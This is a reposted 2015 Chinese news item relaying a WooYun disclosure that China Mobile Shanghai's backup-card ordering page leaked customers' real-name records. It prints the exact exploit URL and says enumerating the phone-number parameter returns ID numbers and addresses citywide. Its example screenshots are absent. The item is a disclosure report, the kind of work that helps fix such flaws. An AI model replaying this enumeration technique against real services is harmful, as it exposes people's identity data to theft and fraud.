天下网吧 >> 网吧系统 >> 系统动态 >> 正文

中国移动曝漏洞:用户实名信息任意查

2015-6-19不详佚名

乌云漏洞平台披露,通过漏洞,上海移动所有用户实名制信息可任意查询(包括身份证号,居住地址等)。目前,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门通报。

以下是漏洞泄露信息过程:

上海移动,换卡不换号

http://www.sh.10086.cn/shop/app?service=page/base.OrderBackUpCard&listener=initPage

需要验证实名制身份证信息,抓包,发现如下POST请求:

http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post

用户登记的信息竟然直接返回。

利用URL:http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号

可遍历全市用户实名制信息。

例1:

例2:

点到为止,不再遍历。

漏洞证明:例1:

例2:

本文来源:不详 作者:佚名

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com,系统开号,技术支持,服务联系QQ:1175525021本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下